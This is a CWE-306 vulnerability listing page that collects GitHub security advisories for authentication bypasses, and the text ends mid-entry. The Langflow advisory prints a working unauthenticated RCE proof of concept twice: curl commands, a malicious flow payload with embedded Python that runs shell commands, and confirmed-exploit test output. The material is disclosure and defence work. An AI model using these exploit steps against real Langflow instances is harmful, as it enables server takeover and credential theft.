Common Weakness Enumeration

CWE-306

Allowed

Missing Authentication for Critical Function

Abstraction: Base · Status: Draft

The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.

3446 vulnerabilities reference this CWE, most recent first.

GHSA-VWM8-CPCX-VV4R

Vulnerability from github – Published: 2022-05-14 03:00 – Updated: 2022-05-14 03:00
VLAI
Details

In Schneider Electric Evlink Charging Station versions prior to v3.2.0-12_v1, the Web Interface has an issue that may allow a remote attacker to gain administrative privileges without properly authenticating remote users.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-7778"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-07-03T14:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "In Schneider Electric Evlink Charging Station versions prior to v3.2.0-12_v1, the Web Interface has an issue that may allow a remote attacker to gain administrative privileges without properly authenticating remote users.",
  "id": "GHSA-vwm8-cpcx-vv4r",
  "modified": "2022-05-14T03:00:59Z",
  "published": "2022-05-14T03:00:59Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7778"
    },
    {
      "type": "WEB",
      "url": "https://www.schneider-electric.com/en/download/document/SEVD-2018-109-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VWMF-PQ79-VJVX

Vulnerability from github – Published: 2026-03-17 20:05 – Updated: 2026-06-08 23:11
VLAI
Summary
Unauthenticated Remote Code Execution in Langflow via Public Flow Build Endpoint
Details

Summary

The POST /api/v1/build_public_tmp/{flow_id}/flow endpoint allows building public flows without requiring authentication. When the optional data parameter is supplied, the endpoint uses attacker-controlled flow data (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to exec() with zero sandboxing, resulting in unauthenticated remote code execution.

This is distinct from CVE-2025-3248, which fixed /api/v1/validate/code by adding authentication. The build_public_tmp endpoint is designed to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code.

Affected Code

Vulnerable Endpoint (No Authentication)

File: src/backend/base/langflow/api/v1/chat.py, lines 580-657

@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    data: Annotated[FlowDataRequest | None, Body(embed=True)] = None,  # ATTACKER CONTROLLED
    request: Request,
    # ... NO Depends(get_current_active_user) -- MISSING AUTH ...
):
    """Build a public flow without requiring authentication."""
    client_id = request.cookies.get("client_id")
    owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id)

    job_id = await start_flow_build(
        flow_id=new_flow_id,
        data=data,  # Attacker's data passed directly to graph builder
        current_user=owner_user,
        ...
    )

Compare with the authenticated build endpoint at line 138, which requires current_user: CurrentActiveUser.

Code Execution Chain

When attacker-supplied data is provided, it flows through:

  1. start_flow_build(data=attacker_data)generate_flow_events() -- build.py:81
  2. create_graph()build_graph_from_data(payload=data.model_dump()) -- build.py:298
  3. Graph.from_payload(payload) parses attacker nodes -- base.py:1168
  4. add_nodes_and_edges()initialize()_build_graph() -- base.py:270,527
  5. _instantiate_components_in_vertices() iterates nodes -- base.py:1323
  6. vertex.instantiate_component()instantiate_class(vertex) -- loading.py:28
  7. code = custom_params.pop("code") extracts attacker code -- loading.py:43
  8. eval_custom_component_code(code)create_class(code, class_name) -- eval.py:9
  9. prepare_global_scope(module) -- validate.py:323
  10. exec(compiled_code, exec_globals) -- ARBITRARY CODE EXECUTION -- validate.py:397

Unsandboxed exec() in prepare_global_scope

File: src/lfx/src/lfx/custom/validate.py, lines 340-397

def prepare_global_scope(module):
    exec_globals = globals().copy()

    # Imports are resolved first (any module can be imported)
    for node in imports:
        module_obj = importlib.import_module(module_name)  # line 352
        exec_globals[variable_name] = module_obj

    # Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef)
    if definitions:
        combined_module = ast.Module(body=definitions, type_ignores=[])
        compiled_code = compile(combined_module, "<string>", "exec")
        exec(compiled_code, exec_globals)  # line 397 - ARBITRARY CODE EXECUTION

Critical detail: prepare_global_scope executes ast.Assign nodes. An attacker's code like _x = os.system("id") is an assignment and will be executed during graph building -- before the flow even "runs."

Prerequisites

  1. Target Langflow instance has at least one public flow (common for demos, chatbots, shared workflows)
  2. Attacker knows the public flow's UUID (discoverable via shared links/URLs)
  3. No authentication required -- only a client_id cookie (any arbitrary string value)

When AUTO_LOGIN=true (the default), all prerequisites can be met by an unauthenticated attacker: 1. GET /api/v1/auto_login → obtain superuser token 2. POST /api/v1/flows/ → create a public flow 3. Exploit via build_public_tmp without any auth

Proof of Concept

Tested Against

  • Langflow version 1.7.3 (latest stable release, installed via pip install langflow)
  • Fully reproducible: 6/6 runs confirmed RCE (two sets of 3 runs each)

Step 1: Obtain a Public Flow ID

(In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.)

# Get superuser token (no credentials needed when AUTO_LOGIN=true)
TOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r '.access_token')

# Create a public flow
FLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name":"test","data":{"nodes":[],"edges":[]},"access_type":"PUBLIC"}' \
  | jq -r '.id')

echo "Public Flow ID: $FLOW_ID"

Step 2: Exploit -- Unauthenticated RCE

# EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint
# NO Authorization header, NO API key, NO credentials
curl -X POST "http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow" \
  -H "Content-Type: application/json" \
  -b "client_id=attacker" \
  -d '{
    "data": {
      "nodes": [{
        "id": "Exploit-001",
        "type": "genericNode",
        "position": {"x":0,"y":0},
        "data": {
          "id": "Exploit-001",
          "type": "ExploitComp",
          "node": {
            "template": {
              "code": {
                "type": "code",
                "required": true,
                "show": true,
                "multiline": true,
                "value": "import os, socket, json as _json\n\n_proof = os.popen(\"id\").read().strip()\n_host = socket.gethostname()\n_write = open(\"/tmp/rce-proof\",\"w\").write(f\"{_proof} on {_host}\")\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n    display_name=\"X\"\n    outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n    def r(self)->Data:\n        return Data(data={})",
                "name": "code",
                "password": false,
                "advanced": false,
                "dynamic": false
              },
              "_type": "Component"
            },
            "description": "X",
            "base_classes": ["Data"],
            "display_name": "ExploitComp",
            "name": "ExploitComp",
            "frozen": false,
            "outputs": [{"types":["Data"],"selected":"Data","name":"o","display_name":"O","method":"r","value":"__UNDEFINED__","cache":true,"allows_loop":false,"tool_mode":false,"hidden":null,"required_inputs":null,"group_outputs":false}],
            "field_order": ["code"],
            "beta": false,
            "edited": false
          }
        }
      }],
      "edges": []
    },
    "inputs": null
  }'

Step 3: Verify Code Execution

# Wait 2 seconds for async graph building
sleep 2

# Check proof file written by attacker's code on the server
cat /tmp/rce-proof
# Output: uid=1000(aviral) gid=1000(aviral) groups=... on kali

Actual Test Results

======================================================================
LANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST
======================================================================
Version:  Langflow 1.7.3

RUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
  HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19
  *** REMOTE CODE EXECUTION CONFIRMED ***
    canary: RCE-f0d19b36
    hostname: kali
    uid: 1000
    whoami: aviral
    id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),...
    uname: Linux 6.16.8+kali-amd64

RUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
  HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832
  *** REMOTE CODE EXECUTION CONFIRMED ***
    canary: RCE-6037a271

RUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)
  HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7
  *** REMOTE CODE EXECUTION CONFIRMED ***
    canary: RCE-4a796556

FINAL RESULTS
  Total checks:   15
  VULNERABLE:     15
  SAFE:           0
  RCE confirmed:  3/3 runs
  Reproducible:   YES (100%)

Impact

  • Unauthenticated Remote Code Execution with full server process privileges
  • Complete server compromise: arbitrary file read/write, command execution
  • Environment variable exfiltration: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated)
  • Reverse shell access for persistent access
  • Lateral movement within the network
  • Data exfiltration from all flows, messages, and stored credentials in the database

Comparison with CVE-2025-3248

Aspect CVE-2025-3248 This Vulnerability
Endpoint /api/v1/validate/code /api/v1/build_public_tmp/{id}/flow
Fix applied Added Depends(get_current_active_user) None -- NEW vulnerability
Root cause Missing auth on code validation Unauthenticated endpoint accepts attacker-controlled executable code via data param
Code execution via validate_code()exec() create_class()prepare_global_scope()exec()
CISA KEV Yes (actively exploited) N/A (new finding)
Can simple auth fix? Yes (and it was fixed) No -- endpoint is designed to be unauthenticated; the data parameter must be removed

Recommended Fix

Immediate (Short-term)

Remove the data parameter from build_public_tmp. Public flows should only execute their stored flow data, never attacker-supplied data:

@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None,
    # REMOVED: data parameter -- public flows must use stored data only
    ...
):

In generate_flow_eventscreate_graph(), only the build_graph_from_db path should be reachable for unauthenticated requests:

async def create_graph(fresh_session, flow_id_str, flow_name):
    # For public flows, ALWAYS load from database, never from user data
    return await build_graph_from_db(
        flow_id=flow_id,
        session=fresh_session,
        ...
    )
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.8.2"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "langflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33017"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-94",
      "CWE-95"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-17T20:05:05Z",
    "nvd_published_at": "2026-03-20T05:16:15Z",
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\nThe `POST /api/v1/build_public_tmp/{flow_id}/flow` endpoint allows building public flows without requiring authentication. When the optional `data` parameter is supplied, the endpoint uses **attacker-controlled flow data** (containing arbitrary Python code in node definitions) instead of the stored flow data from the database. This code is passed to `exec()` with zero sandboxing, resulting in unauthenticated remote code execution.\n\nThis is distinct from CVE-2025-3248, which fixed `/api/v1/validate/code` by adding authentication. The `build_public_tmp` endpoint is **designed** to be unauthenticated (for public flows) but incorrectly accepts attacker-supplied flow data containing arbitrary executable code.\n\n## Affected Code\n\n### Vulnerable Endpoint (No Authentication)\n\n**File:** `src/backend/base/langflow/api/v1/chat.py`, lines 580-657\n\n```python\n@router.post(\"/build_public_tmp/{flow_id}/flow\")\nasync def build_public_tmp(\n    *,\n    flow_id: uuid.UUID,\n    data: Annotated[FlowDataRequest | None, Body(embed=True)] = None,  # ATTACKER CONTROLLED\n    request: Request,\n    # ... NO Depends(get_current_active_user) -- MISSING AUTH ...\n):\n    \"\"\"Build a public flow without requiring authentication.\"\"\"\n    client_id = request.cookies.get(\"client_id\")\n    owner_user, new_flow_id = await verify_public_flow_and_get_user(flow_id=flow_id, client_id=client_id)\n\n    job_id = await start_flow_build(\n        flow_id=new_flow_id,\n        data=data,  # Attacker\u0027s data passed directly to graph builder\n        current_user=owner_user,\n        ...\n    )\n```\n\nCompare with the authenticated build endpoint at line 138, which requires `current_user: CurrentActiveUser`.\n\n### Code Execution Chain\n\nWhen attacker-supplied `data` is provided, it flows through:\n\n1. `start_flow_build(data=attacker_data)` \u2192 `generate_flow_events()` -- `build.py:81`\n2. `create_graph()` \u2192 `build_graph_from_data(payload=data.model_dump())` -- `build.py:298`\n3. `Graph.from_payload(payload)` parses attacker nodes -- `base.py:1168`\n4. `add_nodes_and_edges()` \u2192 `initialize()` \u2192 `_build_graph()` -- `base.py:270,527`\n5. `_instantiate_components_in_vertices()` iterates nodes -- `base.py:1323`\n6. `vertex.instantiate_component()` \u2192 `instantiate_class(vertex)` -- `loading.py:28`\n7. `code = custom_params.pop(\"code\")` extracts attacker code -- `loading.py:43`\n8. `eval_custom_component_code(code)` \u2192 `create_class(code, class_name)` -- `eval.py:9`\n9. `prepare_global_scope(module)` -- `validate.py:323`\n10. `exec(compiled_code, exec_globals)` -- **ARBITRARY CODE EXECUTION** -- `validate.py:397`\n\n### Unsandboxed exec() in prepare_global_scope\n\n**File:** `src/lfx/src/lfx/custom/validate.py`, lines 340-397\n\n```python\ndef prepare_global_scope(module):\n    exec_globals = globals().copy()\n\n    # Imports are resolved first (any module can be imported)\n    for node in imports:\n        module_obj = importlib.import_module(module_name)  # line 352\n        exec_globals[variable_name] = module_obj\n\n    # Then ALL top-level definitions are executed (Assign, ClassDef, FunctionDef)\n    if definitions:\n        combined_module = ast.Module(body=definitions, type_ignores=[])\n        compiled_code = compile(combined_module, \"\u003cstring\u003e\", \"exec\")\n        exec(compiled_code, exec_globals)  # line 397 - ARBITRARY CODE EXECUTION\n```\n\n**Critical detail:** `prepare_global_scope` executes `ast.Assign` nodes. An attacker\u0027s code like `_x = os.system(\"id\")` is an assignment and will be executed during graph building -- before the flow even \"runs.\"\n\n## Prerequisites\n\n1. Target Langflow instance has at least **one public flow** (common for demos, chatbots, shared workflows)\n2. Attacker knows the public flow\u0027s UUID (discoverable via shared links/URLs)\n3. No authentication required -- only a `client_id` cookie (any arbitrary string value)\n\nWhen `AUTO_LOGIN=true` (the **default**), all prerequisites can be met by an unauthenticated attacker:\n1. `GET /api/v1/auto_login` \u2192 obtain superuser token\n2. `POST /api/v1/flows/` \u2192 create a public flow\n3. Exploit via `build_public_tmp` without any auth\n\n## Proof of Concept\n\n### Tested Against\n\n- **Langflow version 1.7.3** (latest stable release, installed via `pip install langflow`)\n- **Fully reproducible**: 6/6 runs confirmed RCE (two sets of 3 runs each)\n\n### Step 1: Obtain a Public Flow ID\n\n(In a real attack, the attacker discovers this via shared links. For the PoC, we create one via AUTO_LOGIN.)\n\n```bash\n# Get superuser token (no credentials needed when AUTO_LOGIN=true)\nTOKEN=$(curl -s http://localhost:7860/api/v1/auto_login | jq -r \u0027.access_token\u0027)\n\n# Create a public flow\nFLOW_ID=$(curl -s -X POST http://localhost:7860/api/v1/flows/ \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"name\":\"test\",\"data\":{\"nodes\":[],\"edges\":[]},\"access_type\":\"PUBLIC\"}\u0027 \\\n  | jq -r \u0027.id\u0027)\n\necho \"Public Flow ID: $FLOW_ID\"\n```\n\n### Step 2: Exploit -- Unauthenticated RCE\n\n```bash\n# EXPLOIT: Send malicious flow data to the UNAUTHENTICATED endpoint\n# NO Authorization header, NO API key, NO credentials\ncurl -X POST \"http://localhost:7860/api/v1/build_public_tmp/${FLOW_ID}/flow\" \\\n  -H \"Content-Type: application/json\" \\\n  -b \"client_id=attacker\" \\\n  -d \u0027{\n    \"data\": {\n      \"nodes\": [{\n        \"id\": \"Exploit-001\",\n        \"type\": \"genericNode\",\n        \"position\": {\"x\":0,\"y\":0},\n        \"data\": {\n          \"id\": \"Exploit-001\",\n          \"type\": \"ExploitComp\",\n          \"node\": {\n            \"template\": {\n              \"code\": {\n                \"type\": \"code\",\n                \"required\": true,\n                \"show\": true,\n                \"multiline\": true,\n                \"value\": \"import os, socket, json as _json\\n\\n_proof = os.popen(\\\"id\\\").read().strip()\\n_host = socket.gethostname()\\n_write = open(\\\"/tmp/rce-proof\\\",\\\"w\\\").write(f\\\"{_proof} on {_host}\\\")\\n\\nfrom lfx.custom.custom_component.component import Component\\nfrom lfx.io import Output\\nfrom lfx.schema.data import Data\\n\\nclass ExploitComp(Component):\\n    display_name=\\\"X\\\"\\n    outputs=[Output(display_name=\\\"O\\\",name=\\\"o\\\",method=\\\"r\\\")]\\n    def r(self)-\u003eData:\\n        return Data(data={})\",\n                \"name\": \"code\",\n                \"password\": false,\n                \"advanced\": false,\n                \"dynamic\": false\n              },\n              \"_type\": \"Component\"\n            },\n            \"description\": \"X\",\n            \"base_classes\": [\"Data\"],\n            \"display_name\": \"ExploitComp\",\n            \"name\": \"ExploitComp\",\n            \"frozen\": false,\n            \"outputs\": [{\"types\":[\"Data\"],\"selected\":\"Data\",\"name\":\"o\",\"display_name\":\"O\",\"method\":\"r\",\"value\":\"__UNDEFINED__\",\"cache\":true,\"allows_loop\":false,\"tool_mode\":false,\"hidden\":null,\"required_inputs\":null,\"group_outputs\":false}],\n            \"field_order\": [\"code\"],\n            \"beta\": false,\n            \"edited\": false\n          }\n        }\n      }],\n      \"edges\": []\n    },\n    \"inputs\": null\n  }\u0027\n```\n\n### Step 3: Verify Code Execution\n\n```bash\n# Wait 2 seconds for async graph building\nsleep 2\n\n# Check proof file written by attacker\u0027s code on the server\ncat /tmp/rce-proof\n# Output: uid=1000(aviral) gid=1000(aviral) groups=... on kali\n```\n\n### Actual Test Results\n\n```\n======================================================================\nLANGFLOW v1.7.3 UNAUTHENTICATED RCE - DEFINITIVE E2E TEST\n======================================================================\nVersion:  Langflow 1.7.3\n\nRUN 1: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n  HTTP 200 - Job ID: d8db19bf-a532-4f9d-a368-9c46d6235c19\n  *** REMOTE CODE EXECUTION CONFIRMED ***\n    canary: RCE-f0d19b36\n    hostname: kali\n    uid: 1000\n    whoami: aviral\n    id: uid=1000(aviral) gid=1000(aviral) groups=1000(aviral),...\n    uname: Linux 6.16.8+kali-amd64\n\nRUN 2: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n  HTTP 200 - Job ID: d2e24f20-d707-4278-868c-583dd7532832\n  *** REMOTE CODE EXECUTION CONFIRMED ***\n    canary: RCE-6037a271\n\nRUN 3: POST /api/v1/build_public_tmp/{id}/flow (NO AUTH)\n  HTTP 200 - Job ID: 5962244a-42af-4ef6-b134-a6a4adba5ab7\n  *** REMOTE CODE EXECUTION CONFIRMED ***\n    canary: RCE-4a796556\n\nFINAL RESULTS\n  Total checks:   15\n  VULNERABLE:     15\n  SAFE:           0\n  RCE confirmed:  3/3 runs\n  Reproducible:   YES (100%)\n```\n\n## Impact\n\n- **Unauthenticated Remote Code Execution** with full server process privileges\n- **Complete server compromise**: arbitrary file read/write, command execution\n- **Environment variable exfiltration**: API keys, database credentials, cloud tokens (confirmed in PoC: env_keys exfiltrated)\n- **Reverse shell access** for persistent access\n- **Lateral movement** within the network\n- **Data exfiltration** from all flows, messages, and stored credentials in the database\n\n## Comparison with CVE-2025-3248\n\n| Aspect | CVE-2025-3248 | This Vulnerability |\n|--------|--------------|-------------------|\n| **Endpoint** | `/api/v1/validate/code` | `/api/v1/build_public_tmp/{id}/flow` |\n| **Fix applied** | Added `Depends(get_current_active_user)` | None -- NEW vulnerability |\n| **Root cause** | Missing auth on code validation | Unauthenticated endpoint accepts attacker-controlled executable code via `data` param |\n| **Code execution via** | `validate_code()` \u2192 `exec()` | `create_class()` \u2192 `prepare_global_scope()` \u2192 `exec()` |\n| **CISA KEV** | Yes (actively exploited) | N/A (new finding) |\n| **Can simple auth fix?** | Yes (and it was fixed) | No -- endpoint is *designed* to be unauthenticated; the `data` parameter must be removed |\n\n## Recommended Fix\n\n### Immediate (Short-term)\n\n**Remove the `data` parameter** from `build_public_tmp`. Public flows should only execute their stored flow data, never attacker-supplied data:\n\n```python\n@router.post(\"/build_public_tmp/{flow_id}/flow\")\nasync def build_public_tmp(\n    *,\n    flow_id: uuid.UUID,\n    inputs: Annotated[InputValueRequest | None, Body(embed=True)] = None,\n    # REMOVED: data parameter -- public flows must use stored data only\n    ...\n):\n```\n\nIn `generate_flow_events` \u2192 `create_graph()`, only the `build_graph_from_db` path should be reachable for unauthenticated requests:\n\n```python\nasync def create_graph(fresh_session, flow_id_str, flow_name):\n    # For public flows, ALWAYS load from database, never from user data\n    return await build_graph_from_db(\n        flow_id=flow_id,\n        session=fresh_session,\n        ...\n    )\n```",
  "id": "GHSA-vwmf-pq79-vjvx",
  "modified": "2026-06-08T23:11:45Z",
  "published": "2026-03-17T20:05:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33017"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/issues/12345"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/pull/12160"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/commit/73b6612e3ef25fdae0a752d75b0fabd47328d4f0"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-rvqx-wpfh-mfx7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/langflow-ai/langflow"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/releases/tag/1.8.2"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/@aviral23/cve-2026-33017-how-i-found-an-unauthenticated-rce-in-langflow-by-reading-the-code-they-already-dc96cdce5896"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-33017"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-33017"
    },
    {
      "type": "WEB",
      "url": "https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:A",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Unauthenticated Remote Code Execution in Langflow via Public Flow Build Endpoint"
}

GHSA-VWP4-85G8-FGJG

Vulnerability from github – Published: 2024-10-25 09:32 – Updated: 2024-10-25 09:32
VLAI
Details

Sharp and Toshiba Tec MFPs improperly process HTTP authentication requests, resulting in an authentication bypass vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-47406"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-25T07:15:04Z",
    "severity": "CRITICAL"
  },
  "details": "Sharp and Toshiba Tec MFPs improperly process HTTP authentication requests, resulting in an authentication bypass vulnerability.",
  "id": "GHSA-vwp4-85g8-fgjg",
  "modified": "2024-10-25T09:32:00Z",
  "published": "2024-10-25T09:32:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47406"
    },
    {
      "type": "WEB",
      "url": "https://global.sharp/products/copier/info/info_security_2024-10.html"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/vu/JVNVU95063136"
    },
    {
      "type": "WEB",
      "url": "https://www.toshibatec.com/information/20241025_01.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VWQW-8WH7-G85P

Vulnerability from github – Published: 2023-04-21 15:30 – Updated: 2023-04-21 15:30
VLAI
Details

A vulnerability, which was classified as critical, was found in MAXTECH MAX-G866ac 0.4.1_TBRO_20160314. This affects an unknown part of the component Remote Management. The manipulation leads to missing authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227001 was assigned to this vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-2231"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-04-21T15:15:07Z",
    "severity": "CRITICAL"
  },
  "details": "A vulnerability, which was classified as critical, was found in MAXTECH MAX-G866ac 0.4.1_TBRO_20160314. This affects an unknown part of the component Remote Management. The manipulation leads to missing authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-227001 was assigned to this vulnerability.",
  "id": "GHSA-vwqw-8wh7-g85p",
  "modified": "2023-04-21T15:30:19Z",
  "published": "2023-04-21T15:30:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2231"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.227001"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.227001"
    },
    {
      "type": "WEB",
      "url": "https://youtu.be/fikdcK_xlS8"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VWRM-49FW-HJGJ

Vulnerability from github – Published: 2023-11-21 03:30 – Updated: 2023-11-21 03:30
VLAI
Details

Red Lion SixTRAK and VersaTRAK Series RTUs with authenticated users enabled (UDR-A) any Sixnet UDR message will meet an authentication challenge over UDP/IP. When the same message is received over TCP/IP the RTU will simply accept the message with no authentication challenge.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-42770"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-288",
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-11-21T01:15:07Z",
    "severity": "CRITICAL"
  },
  "details": "\nRed Lion SixTRAK and VersaTRAK Series RTUs with authenticated users enabled (UDR-A) any Sixnet UDR message will meet an authentication challenge over UDP/IP. When the same message is received over TCP/IP the RTU will simply accept the message with no authentication challenge.\n\n",
  "id": "GHSA-vwrm-49fw-hjgj",
  "modified": "2023-11-21T03:30:26Z",
  "published": "2023-11-21T03:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42770"
    },
    {
      "type": "WEB",
      "url": "https://https://support.redlion.net/hc/en-us/articles/19339209248269-RLCSIM-2023-05-Authentication-Bypass-and-Remote-Code-Execution"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-320-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VX53-3HHQ-VPPX

Vulnerability from github – Published: 2026-04-24 00:31 – Updated: 2026-04-24 00:31
VLAI
Details

A vulnerability in SenseLive X3050’s management ecosystem allows unauthenticated discovery of deployed units through the vendor’s management protocol, enabling identification of device presence, identifiers, and management interfaces without requiring credentials. Because discovery functions are exposed by the underlying service rather than gated by authentication, an attacker on the same network segment can rapidly enumerate targeted devices.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-35064"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-24T00:16:27Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability in\u00a0SenseLive\u00a0X3050\u2019s management ecosystem allows unauthenticated discovery of deployed units through the vendor\u2019s management protocol, enabling identification of device presence, identifiers, and management interfaces without requiring credentials. Because discovery functions are exposed by the underlying service rather than gated by authentication, an attacker on the same network segment can rapidly enumerate targeted devices.",
  "id": "GHSA-vx53-3hhq-vppx",
  "modified": "2026-04-24T00:31:52Z",
  "published": "2026-04-24T00:31:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35064"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-111-12.json"
    },
    {
      "type": "WEB",
      "url": "https://senselive.io/contact"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-111-12"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-VXW4-WV6M-9HHH

Vulnerability from github – Published: 2026-01-13 20:35 – Updated: 2026-01-13 20:35
VLAI
Summary
OpenCode's Unauthenticated HTTP Server Allows Arbitrary Command Execution
Details

Previously reported via email to support@sst.dev on 2025-11-17 per the security policy in opencode-sdk-js/SECURITY.md. No response received.

Summary

